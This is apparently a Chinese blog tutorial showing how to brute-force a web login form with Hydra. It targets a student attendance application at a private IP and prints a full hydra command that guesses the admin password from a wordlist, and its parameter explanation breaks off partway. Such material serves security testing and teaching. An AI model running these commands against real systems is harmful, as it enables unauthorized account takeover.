使用hydra执行http表单暴力破解

通过浏览器自带分析得知:

提交地址:http://10.0.0.115/student_attendance/ajax.php?action=login

提交方式:POST

提交数据:username=a&password=a

服务响应:3

根据以上收集的信息就可以使用hydra进行密码爆破

hydra 10.0.0.115 http-form-post "/student_attendance/ajax.php?action=login:username=^USER^&password=^PASS^:\r\n\r\n3" -ladmin -P MidPwds.txt -vV -f

参数说明

10.0.0.115 目标主机地址
http-form-post POST提交方

点赞(0) 打赏

评论列表 共有 0 条评论

暂无评论

微信小程序

微信扫一扫体验

立即
投稿

微信公众账号

微信扫一扫加关注

发表
评论
返回
顶部